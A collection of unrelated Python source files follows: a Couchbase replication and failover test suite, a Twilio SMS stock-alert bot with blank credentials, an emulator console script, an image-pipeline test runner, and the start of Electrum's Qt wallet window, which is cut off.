stat_key = 'vb_0:open_checkpoint_id'
rest = RestConnection(self.master)
nodes = rest.node_statuses()
failover_node = None
for node in nodes:
if node.id.find(self.master.ip) >= 0:
failover_node = node
self._set_checkpoint_size(self.servers[:self.num_servers], self.bucket, self.checkpoint_size)
generate_load = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
data_load_thread = Thread(target=self._load_all_buckets,
name="load_data",
args=(self.master, generate_load, "create", 0, 1, 0, True, self.checkpoint_size, 5, 180))
data_load_thread.start()
time.sleep(5)
prev_backfill_timestamp_R1 = self._get_backfill_timestamp(self.replica1, self.replica2)
prev_backfill_timestamp_R2 = self._get_backfill_timestamp(self.replica2, self.replica3)
failed_over = rest.fail_over(failover_node.id)
if not failed_over:
self.log.info("unable to failover the node the first time. try again in 60 seconds..")
#try again in 60 seconds
time.sleep(75)
failed_over = rest.fail_over(failover_node.id)
self.assertTrue(failed_over, "unable to failover node %s" % (self.master.ip))
self.log.info("failed over node : {0}".format(failover_node.id))
data_load_thread.join()
self._verify_backfill_happen(self.replica1, self.replica2, prev_backfill_timestamp_R1)
self._verify_backfill_happen(self.replica2, self.replica3, prev_backfill_timestamp_R2)
self.cluster.rebalance(self.servers[:self.num_servers], [], [self.master])
self.cluster.rebalance(self.servers[1:self.num_servers], [self.master], [])
def checkpoint_replication_pause_failover(self):
"""Load N items. Stop replication R3. Load N' more items.
Failover R2. When restart replication to R3, verify backfill doesn't happen on R1."""
param = 'checkpoint'
stat_key = 'vb_0:open_checkpoint_id'
rest = RestConnection(self.master)
nodes = rest.node_statuses()
failover_node = None
for node in nodes:
if node.id.find(self.replica2.ip) >= 0:
failover_node = node
self._set_checkpoint_size(self.servers[:self.num_servers], self.bucket, self.checkpoint_size)
generate_load_one = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, generate_load_one, "create", 0, 1, 0, True, batch_size=self.checkpoint_size, pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
prev_backfill_timestamp_R1 = self._get_backfill_timestamp(self.replica1, self.replica2)
m_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key)
self._stop_replication(self.replica3, self.bucket)
generate_load_two = BlobGenerator('sqlite', 'sqlite-', self.value_size, end=self.num_items)
data_load_thread = Thread(target=self._load_all_buckets,
name="load_data",
args=(self.master, generate_load_two, "create", 0, 1, 0, True, self.checkpoint_size, 5, 180))
data_load_thread.start()
failed_over = rest.fail_over(failover_node.id)
if not failed_over:
self.log.info("unable to failover the node the first time. try again in 60 seconds..")
#try again in 60 seconds
time.sleep(75)
failed_over = rest.fail_over(failover_node.id)
self.assertTrue(failed_over, "unable to failover node %s".format(self.replica2.ip))
self.log.info("failed over node : {0}".format(failover_node.id))
data_load_thread.join()
self._start_replication(self.replica3, self.bucket)
self.servers = []
self.servers = [self.master, self.replica1, self.replica3]
self.num_servers = len(self.servers)
self._verify_checkpoint_id(param, stat_key, m_stats)
self._verify_stats_all_buckets(self.servers[:self.num_servers])
self._verify_backfill_happen(self.replica1, self.replica2, prev_backfill_timestamp_R1)
self.cluster.rebalance([self.master, self.replica1, self.replica2, self.replica3], [], [self.replica2])
self.cluster.rebalance([self.master, self.replica1, self.replica3], [self.replica2], [])
def checkpoint_server_down(self):
"""Load N items. Shut down server R2. Then Restart R2 and
verify backfill happens on R1 and R2."""
param = 'checkpoint'
stat_key = 'vb_0:open_checkpoint_id'
rest = RestConnection(self.master)
self._set_checkpoint_size(self.servers[:self.num_servers], self.bucket, self.checkpoint_size)
generate_load_one = BlobGenerator('nosql', 'nosql-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, generate_load_one, "create", 0, 1, 0, True, batch_size=self.checkpoint_size, pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
prev_backfill_timestamp_R1 = self._get_backfill_timestamp(self.replica1, self.replica2)
prev_backfill_timestamp_R2 = self._get_backfill_timestamp(self.replica2, self.replica3)
m_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key)
self._stop_server(self.replica2)
time.sleep(5)
data_load_thread = Thread(target=self._load_data_use_workloadgen, name="load_data", args=(self.master,))
data_load_thread.start()
data_load_thread.join()
self._start_server(self.replica2)
time.sleep(5)
self._verify_checkpoint_id(param, stat_key, m_stats)
self._verify_backfill_happen(self.replica1, self.replica2, prev_backfill_timestamp_R1, True)
self._verify_backfill_happen(self.replica2, self.replica3, prev_backfill_timestamp_R2, True)
def _verify_checkpoint_id(self, param, stat_key, m_stats):
timeout = 60 if (self.num_items * .001) < 60 else self.num_items * .001
#verify checkpiont id increases on master node
chk_pnt = int(m_stats[m_stats.keys()[0]])
tasks = []
tasks.append(self.cluster.async_wait_for_stats([self.master], self.bucket, param, stat_key, '>', chk_pnt))
for task in tasks:
try:
task.result(timeout)
except TimeoutError:
self.fail("New checkpoint not created")
time.sleep(timeout / 10)
# verify Master and all replicas are in sync with checkpoint ids
m_stats = StatsCommon.get_stats([self.master], self.bucket, param, stat_key)
chk_pnt = int(m_stats[m_stats.keys()[0]])
tasks = []
for server in self.servers:
tasks.append(self.cluster.async_wait_for_stats([server], self.bucket, param, stat_key, '==', chk_pnt))
for task in tasks:
try:
task.result(timeout)
except TimeoutError:
self.fail("Master and all replicas are NOT in sync with checkpoint ids")
def _get_backfill_timestamp(self, server, replica_server):
param = 'tap'
stat_key = 'eq_tapq:replication_ns_1@%s:backfill_start_timestamp' % (replica_server.ip)
m_stats = StatsCommon.get_stats([server], self.bucket, param, stat_key)
self.log.info("eq_tapq:replication_ns_1@%s:backfill_start_timestamp: %s" % (replica_server.ip, m_stats[m_stats.keys()[0]]))
return int(m_stats[m_stats.keys()[0]])
def _verify_backfill_happen(self, server, replica_server, previous_timestamp, backfill_happen=False):
current_timestamp = self._get_backfill_timestamp(server, replica_server)
if (current_timestamp - previous_timestamp) < 0:
raise Exception("cbstats tap backfill_start_timestamp doesn't work properly, which fails the test.")
if backfill_happen:
if (current_timestamp - previous_timestamp) == 0:
raise Exception("Backfill doesn't happen as expected! Test fails")
else:
if (current_timestamp - previous_timestamp) > 0:
raise Exception("Backfill happens unexpectedly! Test fails")
def _set_checkpoint_size(self, servers, bucket, size):
ClusterOperationHelper.flushctl_set(servers[0], 'chk_max_items', size, bucket)
def _set_checkpoint_timeout(self, servers, bucket, time):
ClusterOperationHelper.flushctl_set(servers[0], 'chk_period', time, bucket)
def _stop_replication(self, server, bucket):
shell = RemoteMachineShellConnection(server)
shell.execute_cbepctl(self.bucket, "stop", "", "", 0)
shell.execute_cbepctl(self.bucket, "", "set tap_param", "tap_throttle_queue_cap", 10)
shell.disconnect()
def _start_replication(self, server, bucket):
shell = RemoteMachineShellConnection(server)
shell.execute_cbepctl(self.bucket, "start", "", "", 0)
shell.execute_cbepctl(self.bucket, "", "set tap_param", "tap_throttle_queue_cap", 1000000)
shell.disconnect()
def _stop_server(self, server):
shell = RemoteMachineShellConnection(server)
shell.stop_server()
shell.disconnect()
def _start_server(self, server):
shell = RemoteMachineShellConnection(server)
shell.start_server()
shell.disconnect()
def _load_data_use_workloadgen(self, server):
os = "linux"
shell = RemoteMachineShellConnection(server)
if os == "linux":
command = "%stools/cbworkloadgen -n %s:8091 -i %s" % (testconstants.LINUX_COUCHBASE_BIN_PATH, server.ip, self.num_items)
output, error = shell.execute_command(command)
shell.log_command_output(output, error)
shell.disconnect()
def _get_server_by_state(self, servers, bucket, vb_state):
rest = RestConnection(servers[0])
vbuckets = rest.get_vbuckets(bucket)[0]
addr = None
if vb_state == ACTIVE:
addr = vbuckets.master
elif vb_state == REPLICA1:
addr = vbuckets.replica[0].encode("ascii", "ignore")
elif vb_state == REPLICA2:
addr = vbuckets.replica[1].encode("ascii", "ignore")
elif vb_state == REPLICA3:
addr = vbuckets.replica[2].encode("ascii", "ignore")
else:
return None
addr = addr.split(':', 1)[0]
for server in servers:
if addr == server.ip:
return server
return None
|
sms_bot.py
|
import time
from datetime import datetime
from threading import Thread
from Bot.sms_handler import SmsHandler
from trade_backend.trader import CustomTimeZone
class SmsBot:
KARIMS_PHONE_NUMBER = "+"
TWILIO_ACCOUNT_SID_PAID = ''
TWILIO_AUTH_TOKEN_PAID = ''
TWILIO_NUMBER_PAID = "+"
TWILIO_ACCOUNT_SID_TRIAL = ''
TWILIO_AUTH_TOKEN_TRIAL = ''
TWILIO_NUMBER_TRIAL = "+"
def __init__(self, sms_receiver_phone="+"):
self.sms_receiver_phone = sms_receiver_phone
self.processing_received_sms = []
# [{"from_number": "+1000000", "ticker": "aapl", "target_price": "1.3"},{"from_number": "+1000000", "ticker": "aal", "target_price": "3"}]
def keep_processing_symbol_price_sms_command(self):
while True:
time.sleep(1)
for sms_data in self.processing_received_sms:
from_number = sms_data["from_number"]
ticker = sms_data["ticker"]
target_price = sms_data["target_price"]
# Compare these data with the corresponding ticker prices
# When float(actual_price)<=float(target_price) then
self.sms_handler.send_message(to=from_number, body=f"{ticker} has reached {target_price}!",
on_send_message_listener=self.user_command_sms_sent)
def user_command_sms_sent(self, sid, to, body):
"""
auto called when send sms requested is queued in twilio
:param sid:
:param to:
:param body:
:return:
"""
pass
def sms_received(self, sid="", from_number="", body=""):
"""
This function is called when we receive a message from allowed number
:param sid:
:param from_number:
:param body:
:return:
"""
print(sid) # Already deleted from twilio
print(from_number)
print(body)
msg = body.strip().split(" ")
if len(msg) == 2:
ticker = msg[0]
target_price = msg[1]
self.processing_received_sms.append(
{"from_number": from_number, "ticker": ticker, "target_price": target_price})
def start_now(self):
"""
Starts the bot immediately
:return:
"""
self.sms_handler = SmsHandler(twilio_sid=bot.TWILIO_ACCOUNT_SID_TRIAL,
twilio_auth_token=bot.TWILIO_AUTH_TOKEN_TRIAL,
owned_phone_number=bot.TWILIO_NUMBER_TRIAL,
allowed_sender_phone=bot.TWILIO_NUMBER_PAID)
self.sms_handler.wait_for_inbound_sms(on_received_sms_listener=bot.sms_received, refresh_after=2)
def start(self, start_time_iso="now", start_date_iso="", count_24_hr_at_iso_time="15:59:59"):
"""
ALL OF THE TIME AND DATES MUST BE OF America/New_York Time zone
Starts the bot at "start_time_iso" in a new thread
:param start_time_iso: "now" or "hr:m:s" 24hr format. If "now", then start_date_iso is skipped
""
:param start_date_iso: "" or "Y-m-d" the date of the start_time_iso
:param count_24_hr_at_iso_time: A day completes at this specific time. Considered as valid time
:return:
"""
self.day_end_at = count_24_hr_at_iso_time.strip()
if start_time_iso.lower() == "now":
t1 = Thread(target=self.start_now)
t1.start()
else:
time_date = CustomTimeZone() # Time zone is America/New_York by default
curr_time, curr_date = time_date.get_current_iso_time_date_tuple()
curr_year, curr_month, curr_day = curr_date.strip().split("-")
curr_hr, curr_min, curr_sec = curr_time.strip().split(":")
start_year, start_month, start_day = start_date_iso.strip().split("-")
start_hr, start_min, start_sec = start_time_iso.strip().split(":")
start_at = datetime(year=int(start_year), month=int(start_month), day=int(start_day), hour=int(start_hr),
minute=int(start_min), second=int(start_sec))
curr_time_date = datetime(year=int(curr_year), month=int(curr_month), day=int(curr_day), hour=int(curr_hr),
minute=int(curr_min), second=int(curr_sec))
remaining_seconds = (start_at - curr_time_date).total_seconds()
print(f"Bot will start at {start_date_iso} {start_time_iso}")
print(f"A day will be completed at {count_24_hr_at_iso_time}")
print(f"Sleeping for {remaining_seconds} seconds")
time.sleep(remaining_seconds)
t1 = Thread(target=self.start_now)
t1.start()
def stop(self):
"""
Stops the bot
:return:
"""
if __name__ == "__main__":
bot = SmsBot()
bot.start(start_time_iso="now")
|
dolwin.py
|
# Main script to start the emulator
import os
import sys
import time
import threading
import msvcrt
from jdi import JdiClient
dolwin = None
exitDebugThread = False
autorunScript = None
'''
Entry point. Сreate an instance for communicating with JDI, load the specified
file, starts the polling thread for debug messages and waits for a command/quit.
'''
def Main(file):
global dolwin
global exitDebugThread
dolwin = JdiClient("DolwinEmuForPlayground.dll")
print ("Dolwin Python, emulator version: " + dolwin.GetVersion())
print ("Press any key to enter command or Esc to quit...\n")
dolwin.Execute("load " + file)
dolwin.Execute("run")
debugThread = threading.Thread(target=DebugThread)
debugThread.start()
RunAutorun()
while True:
ch = msvcrt.getch()
if ch == b'\x1b': # Esc
break
try:
cmdline = input("(dolwin) ")
if cmdline != "":
if cmdline[0] == '%':
ExecuteCustomCommand(cmdline.split(' ')[1:])
else:
dolwin.Execute(cmdline)
except Exception as e:
print(e)
exitDebugThread = True
dolwin.Execute("unload")
print ("\nThank you for flying Dolwin airlines!")
'''
Debug messages polling thread
'''
def DebugThread():
while exitDebugThread == False:
msgs = dolwin.QueryDebugMessages()
for str in msgs:
print (str)
time.sleep(0.1)
'''
Execute external script as custom command
'''
def ExecuteCustomCommand(args):
try:
module = __import__("Scripts." + args[0], fromlist=['object'])
module.do_command (dolwin, args[1:])
except Exception as e:
print(e)
'''
Run autorun after emulation started
'''
def RunAutorun():
if not autorunScript:
return
with open(autorunScript, "r") as f:
for line in f:
cmdline = line.replace("\n", "")
if not cmdline:
continue
if cmdline[0] == '#':
continue
if cmdline[0] == '%':
ExecuteCustomCommand(cmdline.split(' ')[1:])
else:
dolwin.Execute(cmdline)
if __name__ == '__main__':
if (len(sys.argv) < 2):
print ("Use: py -3 dolwin.py <file> [autorun.txt]")
else:
if len(sys.argv) >= 3:
autorunScript = sys.argv[2]
Main(sys.argv[1])
|
test.py
|
from multiprocessing import Process
def test_segment():
from app import segmentation
segmentation.main("..\\UBIRIS_200_150\\CLASSES_400_300_Part1")
def test_sr():
from app import upscale
upscale.main("test\\upscale\\hr")
def test_classifier():
from app import classifier
classifier.main("test\\upscale\\sr")
def test():
p1 = Process(target=test_segment)
p1.start()
p1.join()
p2 = Process(target=test_sr)
p2.start()
p2.join()
p3 = Process(target=test_classifier)
p3.start()
p3.join()
if __name__ == '__main__':
test()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from .exception_window import Exception_Hook
from PyQt5.QtWidgets import *
from electrum import keystore, simple_config, ecc
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum import constants
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds, PrintError,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate)
from electrum import Transaction
from electrum import util, bitcoin, commands, coinchooser
from electrum import paymentrequest
from electrum.wallet import Multisig_Wallet, AddTransactionException, CannotBumpFee
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.setup_exception_hook()
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 5)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
# todo: update only unconfirmed tx
self.history_list.update()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
